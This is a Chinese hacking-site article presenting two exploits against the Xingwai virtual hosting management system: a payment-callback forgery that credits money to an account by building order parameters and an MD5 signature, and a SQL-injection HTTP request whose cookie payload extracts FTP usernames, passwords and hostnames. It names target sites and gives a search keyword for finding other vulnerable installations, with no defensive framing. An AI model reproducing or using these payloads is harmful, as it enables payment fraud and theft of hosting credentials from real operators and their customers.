Linux安全网 - Linux操作系统_Linux 命令_Linux教程_Linux黑客

会员投稿 投稿指南 本期推荐:
搜索:
您的位置: Linux安全网 > Linux安全 > » 正文

星外虚拟主机管理系统刷钱漏洞+注射漏洞

来源: 未知 分享至:

测试站:http://www.xiaoweio.cn/
注册账号,例如:test
访问:http://www.xiaoweio.cn/netpay/ips/
输入你用户名 以及 充值金额。
例如: test 10元
点下一步,会给你生成一个订单号。比如722978
记住它

参数构造:

billno=订单号&amount=充值金额&date=日期&succ=Y&signature=md5值

复制代码
日期 = 当前日期
充值金额 = 订单号上的金额

加入实际值:
billno=722978&amount=5&date=20100613&succ=Y&signature=990a56c327f4b60d0c4d94a880f728ec

md5值=md5(billno&amount&date&succ)


这里演示的实际md5值为:
md5(722978520100613Y)=990a56c327f4b60d0c4d94a880f728ec


提交url
http://www.xiaoweio.cn/netpay/ips/receive.asp?billno=722978&amount=5&date=20100613&succ=Y&signature=990a56c327f4b60d0c4d94a880f728ec

这样5块钱就来了。
给你们一个关键字:inurl: (netpay/alipay)



注射漏洞

POST /netpay/allbuy/receive.asp?amount=1&success=Y&sign=d3d9df7301929c5684fb52c267186b21 HTTP/1.1

Cookie: billno=1'%20or%200%3c%3e(select%20top%201%20ftpname%2bchar(124)%2bftppassword%2bchar(124)%2bhostname%20from%20FreeHost.FreeHost_Product_Host%20where%20id%20not%20in(select%20top%200%20id%20from%20FreeHost.FreeHost_Product_Host%20order%20by%20id)%20order%20by%20id)%3b--

Content-Type: application/x-www-form-urlencoded

Referer: http://www.9c2c.com/netpay/allbuy/receive.asp?amount=1&success=Y&sign=d3d9df7301929c5684fb52c267186b21

Host: www.9c2c.com

Content-Length: 7

Expect: 100-continue

Connection: Keep-Alive


Tags: ddos tomcat fastcgi resin squid 2.5
分享至:
最新图文资讯
1 2 3 4 5 6
验证码:点击我更换图片 理智评论文明上网,拒绝恶意谩骂 用户名:
关于我们 - 联系我们 - 广告服务 - 友情链接 - 网站地图 - 版权声明 - 发展历史